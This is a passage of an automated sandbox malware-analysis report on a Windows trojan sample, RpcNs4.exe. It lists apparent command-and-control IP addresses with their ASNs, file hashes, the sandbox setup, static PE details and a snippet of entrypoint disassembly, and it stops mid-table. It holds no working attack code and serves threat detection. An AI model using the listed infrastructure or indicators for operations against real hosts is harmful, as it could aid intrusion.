                                                                                    17858POWERVIS-AS-KRLGPOWERCOMMKRtrue
                                                                                    178.33.167.120
                                                                                    unknownFrance
                                                                                    16276OVHFRtrue
                                                                                    162.144.42.60
                                                                                    unknownUnited States
                                                                                    46606UNIFIEDLAYER-AS-1UStrue
                                                                                    190.190.15.20
                                                                                    unknownArgentina
                                                                                    10481TelecomArgentinaSAARtrue
                                                                                    95.216.205.155
                                                                                    unknownGermany
                                                                                    24940HETZNER-ASDEtrue
                                                                                    37.187.100.220
                                                                                    unknownFrance
                                                                                    16276OVHFRtrue
                                                                                    41.212.89.128
                                                                                    unknownKenya
                                                                                    15399WANANCHI-KEtrue
                                                                                    190.85.46.52
                                                                                    unknownColombia
                                                                                    14080TelmexColombiaSACOtrue
                                                                                    120.51.34.254
                                                                                    unknownJapan2519VECTANTARTERIANetworksCorporationJPtrue
                                                                                    187.189.66.200
                                                                                    unknownMexico
                                                                                    22884TOTALPLAYTELECOMUNICACIONESSADECVMXtrue
                                                                                    88.247.58.26
                                                                                    unknownTurkey
                                                                                    9121TTNETTRtrue
                                                                                    103.93.220.182
                                                                                    unknownPhilippines
                                                                                    17639CONVERGE-ASConvergeICTSolutionsIncPHtrue
                                                                                    181.95.133.104
                                                                                    unknownArgentina
                                                                                    7303TelecomArgentinaSAARtrue
                                                                                    117.247.235.44
                                                                                    unknownIndia
                                                                                    9829BSNL-NIBNationalInternetBackboneINtrue
                                                                                    138.201.45.2
                                                                                    unknownGermany
                                                                                    24940HETZNER-ASDEtrue
                                                                                    37.205.9.252
                                                                                    unknownCzech Republic
                                                                                    24971MASTER-ASCzechRepublicwwwmasterczCZtrue
                                                                                    190.194.12.132
                                                                                    unknownArgentina
                                                                                    10481TelecomArgentinaSAARtrue
                                                                                    186.20.52.237
                                                                                    unknownChile
                                                                                    6535TelmexServiciosEmpresarialesSACLtrue
                                                                                    118.243.83.70
                                                                                    unknownJapan4685ASAHI-NETAsahiNetJPtrue
                                                                                    103.80.51.61
                                                                                    unknownThailand
                                                                                    136023PTE-AS-APPTEGroupCoLtdTHtrue
                                                                                    103.48.68.173
                                                                                    unknownIndia
                                                                                    17754EXCELL-ASExcellmediaINtrue
                                                                                    185.86.148.68
                                                                                    unknownLatvia
                                                                                    52173MAKONIXLVtrue
                                                                                    103.133.66.57
                                                                                    unknownIndia
                                                                                    138520LNSPL-AS-APLaluNetworkSolutionsPrivateLimitedINtrue
                                                                                    157.245.138.101
                                                                                    unknownUnited States
                                                                                    14061DIGITALOCEAN-ASNUStrue
                                                                                    119.92.77.17
                                                                                    unknownPhilippines
                                                                                    9299IPG-AS-APPhilippineLongDistanceTelephoneCompanyPHtrue
                                                                                    46.105.131.68
                                                                                    unknownFrance
                                                                                    16276OVHFRtrue
                                                                                    172.105.78.244
                                                                                    unknownUnited States
                                                                                    63949LINODE-APLinodeLLCUStrue
                                                                                    37.46.129.215
                                                                                    unknownRussian Federation
                                                                                    29182THEFIRST-ASRUtrue
                                                                                    192.163.221.191
                                                                                    unknownUnited States
                                                                                    46606UNIFIEDLAYER-AS-1UStrue
                                                                                    162.241.41.111
                                                                                    unknownUnited States
                                                                                    46606UNIFIEDLAYER-AS-1UStrue
                                                                                    190.192.39.136
                                                                                    unknownArgentina
                                                                                    10481TelecomArgentinaSAARtrue
                                                                                    45.177.120.37
                                                                                    unknownBrazil
                                                                                    268987NETLIMITTELECOMBRtrue
                                                                                    202.166.170.43
                                                                                    unknownPakistan
                                                                                    55501CONNECTEL-PK141-143MaulanaShaukatAliRoadPKtrue
                                                                                    86.57.216.23
                                                                                    unknownBelarus
                                                                                    6697BELPAK-ASBELPAKBYtrue
                                                                                    113.161.148.81
                                                                                    unknownViet Nam
                                                                                    45899VNPT-AS-VNVNPTCorpVNtrue
                                                                                    157.7.164.178
                                                                                    unknownJapan7506INTERQGMOInternetIncJPtrue
                                                                                    116.202.10.123
                                                                                    unknownGermany
                                                                                    24940HETZNER-ASDEtrue
                                                                                    192.241.220.183
                                                                                    unknownUnited States
                                                                                    14061DIGITALOCEAN-ASNUStrue
                                                                                    115.176.16.221
                                                                                    unknownJapan2510INFOWEBFUJITSULIMITEDJPtrue
                                                                                    198.57.203.63
                                                                                    unknownUnited States
                                                                                    46606UNIFIEDLAYER-AS-1UStrue
                                                                                    46.32.229.152
                                                                                    unknownUnited Kingdom
                                                                                    20738GD-EMEA-DC-LD5GBtrue
                                                                                    167.71.227.113
                                                                                    unknownUnited States
                                                                                    14061DIGITALOCEAN-ASNUStrue
                                                                                    54.38.143.245
                                                                                    unknownFrance
                                                                                    16276OVHFRtrue
                                                                                    77.74.78.80
                                                                                    unknownRussian Federation
                                                                                    31261GARS-ASMoscowRussiaRUtrue
                                                                                    49.243.9.118
                                                                                    unknownJapan10013FBDCFreeBitCoLtdJPtrue
                                                                                    8.4.9.137
                                                                                    unknownUnited States
                                                                                    3356LEVEL3UStrue
                                                                                    60.125.114.64
                                                                                    unknownJapan17676GIGAINFRASoftbankBBCorpJPtrue
                                                                                    113.160.248.110
                                                                                    unknownViet Nam
                                                                                    45899VNPT-AS-VNVNPTCorpVNtrue
                                                                                    79.133.6.236
                                                                                    unknownFinland
                                                                                    3238ALCOMFItrue
                                                                                    189.150.209.206
                                                                                    unknownMexico
                                                                                    8151UninetSAdeCVMXtrue
                                                                                    58.27.215.3
                                                                                    unknownPakistan
                                                                                    38264WATEEN-IMS-PK-AS-APNationalWiMAXIMSenvironmentPKtrue
                                                                                    185.80.172.199
                                                                                    unknownAzerbaijan
                                                                                    39232UNINETAZtrue
                                                                                    74.208.173.91
                                                                                    unknownUnited States
                                                                                    8560ONEANDONE-ASBrauerstrasse48DEtrue
                                                                                    41.185.29.128
                                                                                    unknownSouth Africa
                                                                                    36943GridhostZAtrue
                                                                                    223.135.30.189
                                                                                    unknownJapan2527SO-NETSo-netEntertainmentCorporationJPtrue
                                                                                    139.59.61.215
                                                                                    unknownSingapore
                                                                                    14061DIGITALOCEAN-ASNUStrue
                                                                                    91.75.75.46
                                                                                    unknownUnited Arab Emirates
                                                                                    15802DU-AS1AEtrue
                                                                                    50.116.78.109
                                                                                    unknownUnited States
                                                                                    46606UNIFIEDLAYER-AS-1UStrue
                                                                                    128.106.187.110
                                                                                    unknownSingapore
                                                                                    9506SINGTEL-FIBRESingtelFibreBroadbandSGtrue
                                                                                    202.153.220.157
                                                                                    unknownAustralia
                                                                                    4764WIDEBAND-AS-APAussieBroadbandAUtrue
                                                                                    139.59.12.63
                                                                                    unknownSingapore
                                                                                    14061DIGITALOCEAN-ASNUStrue
                                                                                    115.79.195.246
                                                                                    unknownViet Nam
                                                                                    7552VIETEL-AS-APViettelGroupVNtrue
                                                                                    185.142.236.163
                                                                                    unknownNetherlands
                                                                                    174COGENT-174UStrue
                                                                                    2.144.244.204
                                                                                    unknownIran (ISLAMIC Republic Of)
                                                                                    44244IRANCELL-ASIRtrue
                                                                                    182.253.83.234
                                                                                    unknownIndonesia
                                                                                    17451BIZNET-AS-APBIZNETNETWORKSIDtrue
                                                                                    179.5.118.12
                                                                                    unknownEl Salvador
                                                                                    14754TelguaGTtrue
                                                                                    91.83.93.103
                                                                                    unknownHungary
                                                                                    12301INVITECHHUtrue
                                                                                    195.201.56.70
                                                                                    unknownGermany
                                                                                    24940HETZNER-ASDEtrue
                                                                                    36.91.44.183
                                                                                    unknownIndonesia
                                                                                    17974TELKOMNET-AS2-APPTTelekomunikasiIndonesiaIDtrue

                                                                                    Private

                                                                                    IP
                                                                                    127.0.0.1

                                                                                    General Information

                                                                                    Joe Sandbox Version:33.0.0 White Diamond
                                                                                    Analysis ID:492876
                                                                                    Start date:29.09.2021
                                                                                    Start time:04:13:11
                                                                                    Joe Sandbox Product:CloudBasic
                                                                                    Overall analysis duration:0h 8m 27s
                                                                                    Hypervisor based Inspection enabled:false
                                                                                    Report type:full
                                                                                    Sample file name:RpcNs4.exe
                                                                                    Cookbook file name:default.jbs
                                                                                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                    Number of analysed new started processes analysed:25
                                                                                    Number of new started drivers analysed:0
                                                                                    Number of existing processes analysed:0
                                                                                    Number of existing drivers analysed:0
                                                                                    Number of injected processes analysed:0
                                                                                    Technologies:
                                                                                    • HCA enabled
                                                                                    • EGA enabled
                                                                                    • HDC enabled
                                                                                    • AMSI enabled
                                                                                    Analysis Mode:default
                                                                                    Analysis stop reason:Timeout
                                                                                    Detection:MAL
                                                                                    Classification:mal96.troj.evad.winEXE@16/5@0/88
                                                                                    EGA Information:
                                                                                    • Successful, ratio: 100%
                                                                                    HDC Information:
                                                                                    • Successful, ratio: 72.1% (good quality ratio 69%)
                                                                                    • Quality average: 82.8%
                                                                                    • Quality standard deviation: 26.7%
                                                                                    HCA Information:
                                                                                    • Successful, ratio: 86%
                                                                                    • Number of executed functions: 39
                                                                                    • Number of non-executed functions: 73
                                                                                    Cookbook Comments:
                                                                                    • Adjust boot time
                                                                                    • Enable AMSI
                                                                                    • Found application associated with file extension: .exe
                                                                                    Warnings:
                                                                                    Show All
                                                                                    • Exclude process from analysis (whitelisted): taskhostw.exe, BackgroundTransferHost.exe, UpdateNotificationMgr.exe, backgroundTaskHost.exe
                                                                                    • Excluded IPs from analysis (whitelisted): 23.211.6.115, 23.211.4.86, 20.82.210.154, 40.112.88.60, 80.67.82.211, 80.67.82.235, 23.203.80.193, 51.124.78.146, 20.50.102.62
                                                                                    • Excluded domains from analysis (whitelisted): fs.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, store-images.s-microsoft.com-c.edgekey.net, e1723.g.akamaiedge.net, settings-win.data.microsoft.com, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, arc.msn.com, settingsfd-geo.trafficmanager.net, ris.api.iris.microsoft.com, e11290.dspg.akamaiedge.net, e12564.dspb.akamaiedge.net, go.microsoft.com, store-images.s-microsoft.com, go.microsoft.com.edgekey.net, arc.trafficmanager.net, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net
                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.

                                                                                    Simulations

                                                                                    Behavior and APIs

                                                                                    TimeTypeDescription
                                                                                    04:14:16API Interceptor2x Sleep call for process: svchost.exe modified
                                                                                    04:15:32API Interceptor1x Sleep call for process: MpCmdRun.exe modified

                                                                                    Joe Sandbox View / Context

                                                                                    IPs

                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                    126.126.139.26sample1.docGet hashmaliciousBrowse
                                                                                      MV9tCJw8Xr.exeGet hashmaliciousBrowse
                                                                                        192.210.217.94sample1.docGet hashmaliciousBrowse
                                                                                          MV9tCJw8Xr.exeGet hashmaliciousBrowse
                                                                                            223.17.215.76sample1.docGet hashmaliciousBrowse
                                                                                              MV9tCJw8Xr.exeGet hashmaliciousBrowse
                                                                                                185.208.226.142sample1.docGet hashmaliciousBrowse
                                                                                                  MV9tCJw8Xr.exeGet hashmaliciousBrowse

                                                                                                    Domains

                                                                                                    No context

                                                                                                    ASN

                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                    GIGAINFRASoftbankBBCorpJParmGet hashmaliciousBrowse
                                                                                                    • 133.121.255.44
                                                                                                    Le85313EpPGet hashmaliciousBrowse
                                                                                                    • 126.240.223.57
                                                                                                    46gV91KJhQGet hashmaliciousBrowse
                                                                                                    • 220.38.228.196
                                                                                                    x86Get hashmaliciousBrowse
                                                                                                    • 218.133.108.199
                                                                                                    armGet hashmaliciousBrowse
                                                                                                    • 126.32.30.5
                                                                                                    RaVPWTArgGGet hashmaliciousBrowse
                                                                                                    • 218.178.205.12
                                                                                                    b2wx6oZNsCGet hashmaliciousBrowse
                                                                                                    • 219.212.202.78
                                                                                                    mirkatclpb.x86Get hashmaliciousBrowse
                                                                                                    • 126.174.103.192
                                                                                                    mirkatclpb.armGet hashmaliciousBrowse
                                                                                                    • 221.87.174.160
                                                                                                    ho4yrUrdk1Get hashmaliciousBrowse
                                                                                                    • 221.77.141.3
                                                                                                    qJvDfzBXbsGet hashmaliciousBrowse
                                                                                                    • 126.11.242.65
                                                                                                    uTfW1dzdIkGet hashmaliciousBrowse
                                                                                                    • 60.107.73.68
                                                                                                    G3kV1FpdsSGet hashmaliciousBrowse
                                                                                                    • 220.61.174.7
                                                                                                    Sht1aYGDIXGet hashmaliciousBrowse
                                                                                                    • 126.184.36.243
                                                                                                    8u6nZbyMxlGet hashmaliciousBrowse
                                                                                                    • 126.210.43.40
                                                                                                    TfaQUm3e4YGet hashmaliciousBrowse
                                                                                                    • 220.47.221.201
                                                                                                    sora.arm7Get hashmaliciousBrowse
                                                                                                    • 126.27.223.210
                                                                                                    L3Gl0GugHoGet hashmaliciousBrowse
                                                                                                    • 219.213.5.22
                                                                                                    Q7rLYKgThtGet hashmaliciousBrowse
                                                                                                    • 126.175.55.215
                                                                                                    F0ZMmHZif5Get hashmaliciousBrowse
                                                                                                    • 220.34.5.157
                                                                                                    AS-COLOCROSSINGUSSuppression .xlsxGet hashmaliciousBrowse
                                                                                                    • 107.172.73.191
                                                                                                    Notification.xlsxGet hashmaliciousBrowse
                                                                                                    • 107.172.93.32
                                                                                                    swift confrimation copy.xlsxGet hashmaliciousBrowse
                                                                                                    • 192.3.141.149
                                                                                                    ORDERCONFIRMATION_00001679918.xlsxGet hashmaliciousBrowse
                                                                                                    • 23.94.159.204
                                                                                                    suppression des suspensions.xlsxGet hashmaliciousBrowse
                                                                                                    • 107.172.73.191
                                                                                                    rrVvnZMcFsGet hashmaliciousBrowse
                                                                                                    • 23.94.26.138
                                                                                                    pAu4km62R9Get hashmaliciousBrowse
                                                                                                    • 23.94.26.138
                                                                                                    kUFNxyzq7hGet hashmaliciousBrowse
                                                                                                    • 23.94.26.138
                                                                                                    RPM.xlsxGet hashmaliciousBrowse
                                                                                                    • 23.95.13.176
                                                                                                    OOLU2032650751.docGet hashmaliciousBrowse
                                                                                                    • 107.175.64.227
                                                                                                    Invoice PO.docGet hashmaliciousBrowse
                                                                                                    • 107.175.64.227
                                                                                                    MOQ-Request_0927210-006452.xlsxGet hashmaliciousBrowse
                                                                                                    • 107.173.219.122
                                                                                                    RFQ_final version.xlsxGet hashmaliciousBrowse
                                                                                                    • 107.173.219.122
                                                                                                    New Price List.xlsxGet hashmaliciousBrowse
                                                                                                    • 192.227.225.173
                                                                                                    RFQ.xlsxGet hashmaliciousBrowse
                                                                                                    • 23.94.159.207
                                                                                                    RFQ.xlsxGet hashmaliciousBrowse
                                                                                                    • 23.94.159.207
                                                                                                    X86_64Get hashmaliciousBrowse
                                                                                                    • 172.245.168.189
                                                                                                    RQcnbthZwWGet hashmaliciousBrowse
                                                                                                    • 172.245.168.189
                                                                                                    haK4nXUWd3Get hashmaliciousBrowse
                                                                                                    • 172.245.168.189
                                                                                                    YIjCULj55aGet hashmaliciousBrowse
                                                                                                    • 172.245.168.189

                                                                                                    JA3 Fingerprints

                                                                                                    No context

                                                                                                    Dropped Files

                                                                                                    No context

                                                                                                    Created / dropped Files

                                                                                                    C:\ProgramData\Microsoft\Network\Downloader\edb.log
                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4096
                                                                                                    Entropy (8bit):0.5961753579683815
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:bJtk1GaD0JOCEfMuaaD0JOCEfMKQmD7/tAl/gz2cE0fMbhEZolrRSQ2hyYIIT:boGaD0JcaaD0JwQQ7/tAg/0bjSQJ
                                                                                                    MD5:FEDBD07F059E293B1CD3A36CE0BF727A
                                                                                                    SHA1:C75214CD386425539B6F6CFD4F48F90753ECC8E7
                                                                                                    SHA-256:5F2FC139A11B5A3E93489883C7A89D0E8B1A4041C87A7ECCEC784845724B031F
                                                                                                    SHA-512:2C6E4AAEA9EFB60D669ED1E420000D09300C46718D9C113DD7A3043703C0BAADFEB9768C78FC80CB5419A1CA845E5985045D452B90EF0FFFFBC0F252CCF70386
                                                                                                    Malicious:false
                                                                                                    Preview: ....E..h..(..........y............... ..1C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@........................y............&......e.f.3...w.......................3...w..................h..C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b...G............................................................................................................................................................................................................
                                                                                                    C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                    File Type:Extensible storage engine DataBase, version 0x620, checksum 0xa82e71d7, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                                    Category:dropped
                                                                                                    Size (bytes):32768
                                                                                                    Entropy (8bit):0.09679207472564298
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:BOzzwl/+0XRIE11Y8TRXQlFHKrOzzwl/+0XRIE11Y8TRXQlFHK:K0+0XO4blQlFHKA0+0XO4blQlFHK
                                                                                                    MD5:CDEE6462BDFBADCE486062CB208FC2D9
                                                                                                    SHA1:8DB277B7CA8CCF9AFDA1AAB7A52FDA9FBAE4FC53
                                                                                                    SHA-256:7CFEB754B63AD2FB2518B163B7626B390B012D8A21773FE973F30E3923A7CC7A
                                                                                                    SHA-512:73DA8F7A98AAB76E4955CB961CBC688C69FB07EF9FD59DCDFAC6A1F379515E7BA1FA601572CAD8400DF8D84E45B7320BC65A767C67A132C5DF53E61478565380
                                                                                                    Malicious:false
                                                                                                    Preview: ..q.... ................e.f.3...w........................&..........w.......y..h.(..............................3...w...........................................................................................................B...........@...................................................................................................... ........3...w.......................................................................................................................................................................................................................................'J!.....y..................n........y..........................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                    C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):8192
                                                                                                    Entropy (8bit):0.1120151278868993
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:+G1Ev1oj8l/bJdAtiE1Tll:pQKj8t4np
                                                                                                    MD5:CEFA19C920301379F5EF73328CDDC635
                                                                                                    SHA1:C2E331B44A1FD9E196F915D0E12208220B4D7A40
                                                                                                    SHA-256:3874419093305358718AEF8A3E11991C90376C705A62C9599D5F0FBCA8F9D678
                                                                                                    SHA-512:79A5FB2F15E7C11D28D6CFBB127C4F775AC64F5CFA409FD8E486995DAC171E7BFB870CC19D6BE84567619159BAEBC07E7B197C4C83611F384AE73C8911B14E39
                                                                                                    Malicious:false
                                                                                                    Preview: H..a.....................................3...w.......y.......w...............w.......w....:O.....w..................n........y..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                    C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):55
                                                                                                    Entropy (8bit):4.306461250274409
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                    MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                    SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                    SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                    SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                    Malicious:false
                                                                                                    Preview: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                                                    C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\MpCmdRun.log
                                                                                                    Process:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                    File Type:data
                                                                                                    Category:modified
                                                                                                    Size (bytes):906
                                                                                                    Entropy (8bit):3.148114293486276
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:58KRBubdpkoF1AG3rlsQlwAuXURk9+MlWlLehB4yAq7ejCEsQlwAuXUw:OaqdmuF3rlp+z+kWReH4yJ7MNp+Z
                                                                                                    MD5:19E4C16502BE85E35AE649BCC464A2FC
                                                                                                    SHA1:5F2C7E7EDDE9D2FB82173C8D2D475261962B6EC8
                                                                                                    SHA-256:DF3C8E555F788FD5070E09BE94C3C9E6D1BEEF3F1B56AC5BE54F99EEB2DAA57D
                                                                                                    SHA-512:04F1E4A94FA9351E3CE88A8DC62453D19FDCD211C61EC1518D40F97DEC3ACD6BE65A2BFABD8E1BA8B4E449F276C694DF8804AA5D75EFF04DD2585D351A2AACEB
                                                                                                    Malicious:false
                                                                                                    Preview: ........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....M.p.C.m.d.R.u.n.:. .C.o.m.m.a.n.d. .L.i.n.e.:. .".C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.m.p.c.m.d.r.u.n...e.x.e.". .-.w.d.e.n.a.b.l.e..... .S.t.a.r.t. .T.i.m.e.:. .. W.e.d. .. S.e.p. .. 2.9. .. 2.0.2.1. .0.4.:.1.5.:.3.2.........M.p.E.n.s.u.r.e.P.r.o.c.e.s.s.M.i.t.i.g.a.t.i.o.n.P.o.l.i.c.y.:. .h.r. .=. .0.x.1.....W.D.E.n.a.b.l.e.....E.R.R.O.R.:. .M.p.W.D.E.n.a.b.l.e.(.T.R.U.E.). .f.a.i.l.e.d. .(.8.0.0.7.0.4.E.C.).....M.p.C.m.d.R.u.n.:. .E.n.d. .T.i.m.e.:. .. W.e.d. .. S.e.p. .. 2.9. .. 2.0.2.1. .0.4.:.1.5.:.3.2.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....

                                                                                                    Static File Info

                                                                                                    General

                                                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                    Entropy (8bit):6.227386311899768
                                                                                                    TrID:
                                                                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                    File name:RpcNs4.exe
                                                                                                    File size:310784
                                                                                                    MD5:1ed37c4a225bbd35716cf241e14541a8
                                                                                                    SHA1:51caf718c3d85847e9f9246b291149a0a7afb698
                                                                                                    SHA256:8b504e796986fbae7d1bea49c95dfad222758cca5cada56472f40a0bde41e485
                                                                                                    SHA512:fa54f2057b8e85c1a84307ee2325cda4393960ca81efe87e929dd5e19516e62604b9081d0964c23b2e8d97fc7a02d5b66a952dc0771a5249cf10074fa765a5e3
                                                                                                    SSDEEP:3072:sNzPwNwAtJKqgYLdcF7pGG7MjzQP3xswlVQN2Lxu2ntX8NUX7uFLuloc:sJPwNwAt/T2F7JcN8U2tM6iV8
                                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............u.U.u.U.u.U.'.U.u.U.'8U.u.U.'.U.u.Uy.,U.u.U.u.U.u.U...U.u.U..;U.u.U.'<U.u.U.upU.u.U..9U.u.URich.u.U................PE..L..

                                                                                                    File Icon

                                                                                                    Icon Hash:317971b1b1b1b1b0

                                                                                                    Static PE Info

                                                                                                    General

                                                                                                    Entrypoint:0x402aec
                                                                                                    Entrypoint Section:.text
                                                                                                    Digitally signed:false
                                                                                                    Imagebase:0x400000
                                                                                                    Subsystem:windows gui
                                                                                                    Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                                                    DLL Characteristics:TERMINAL_SERVER_AWARE, NX_COMPAT
                                                                                                    Time Stamp:0x5F68E28E [Mon Sep 21 17:27:42 2020 UTC]
                                                                                                    TLS Callbacks:
                                                                                                    CLR (.Net) Version:
                                                                                                    OS Version Major:6
                                                                                                    OS Version Minor:0
                                                                                                    File Version Major:6
                                                                                                    File Version Minor:0
                                                                                                    Subsystem Version Major:6
                                                                                                    Subsystem Version Minor:0
                                                                                                    Import Hash:81f57b81eb6db8b252da01e9143dfb75

                                                                                                    Entrypoint Preview

                                                                                                    Instruction
                                                                                                    call 00007F532C740C35h
                                                                                                    jmp 00007F532C73D725h
                                                                                                    push 00000014h
                                                                                                    push 00434230h
                                                                                                    call 00007F532C741453h
                                                                                                    call 00007F532C740FCFh
                                                                                                    movzx esi, ax
                                                                                                    push 00000002h
                                                                                                    call 00007F532C740BC8h
                                                                                                    pop ecx
                                                                                                    mov eax, 00005A4Dh
                                                                                                    cmp word ptr [00400000h], ax
                                                                                                    je 00007F532C73D726h
                                                                                                    xor ebx, ebx
                                                                                                    jmp 00007F532C73D755h
                                                                                                    mov eax, dword ptr [0040003Ch]
                                                                                                    cmp dword ptr [eax+00400000h], 00004550h
                                                                                                    jne 00007F532C73D70Dh
                                                                                                    mov ecx, 0000010Bh
                                                                                                    cmp word ptr [eax+00400018h], cx
                                                                                                    jne 00007F532C73D6FFh
                                                                                                    xor ebx, ebx
                                                                                                    cmp dword ptr [eax+00400074h], 0Eh
                                                                                                    jbe 00007F532C73D72Bh
                                                                                                    cmp dword ptr [eax+004000E8h], ebx
                                                                                                    setne bl
                                                                                                    mov dword ptr [ebp-1Ch], ebx
                                                                                                    call 00007F532C73EC50h
                                                                                                    test eax, eax
                                                                                                    jne 00007F532C73D72Ah
                                                                                                    push 0000001Ch
                                                                                                    call 00007F532C73D847h
                                                                                                    pop ecx
                                                                                                    call 00007F532C73EF13h
                                                                                                    test eax, eax
                                                                                                    jne 00007F532C73D72Ah
                                                                                                    push 00000010h
                                                                                                    call 00007F532C73D836h
                                                                                                    pop ecx
                                                                                                    call 00007F532C740C41h
                                                                                                    and dword ptr [ebp-04h], 00000000h
                                                                                                    call 00007F532C74052Ch
                                                                                                    test eax, eax
                                                                                                    jns 00007F532C73D72Ah
                                                                                                    push 0000001Bh
                                                                                                    call 00007F532C73D81Ch
                                                                                                    pop ecx
                                                                                                    call dword ptr [004390E8h]
                                                                                                    mov dword ptr [00438C14h], eax
                                                                                                    call 00007F532C740C5Ch
                                                                                                    mov dword ptr [004369BCh], eax
                                                                                                    call 00007F532C740819h
                                                                                                    test eax, eax
                                                                                                    jns 00007F532C73D72Ah

                                                                                                    Rich Headers

                                                                                                    Programming Language:
                                                                                                    • [C++] VS2013 UPD5 build 40629
                                                                                                    • [ C ] VS2013 build 21005
                                                                                                    • [LNK] VS2013 UPD5 build 40629
                                                                                                    • [EXP] VS2013 UPD5 build 40629
                                                                                                    • [C++] VS2013 build 21005
                                                                                                    • [ASM] VS2013 build 21005
                                                                                                    • [RES] VS2013 build 21005

                                                                                                    Data Directories

                                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x34b200x15c.rdata
                                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x392b40x50.idata
                                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x3a0000x13d10.rsrc
                                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x4e0000x1bc4.reloc
                                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x323d80x40.rdata
                                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x390000x2b4.idata
                                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                    Sections

                                                                                                    NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
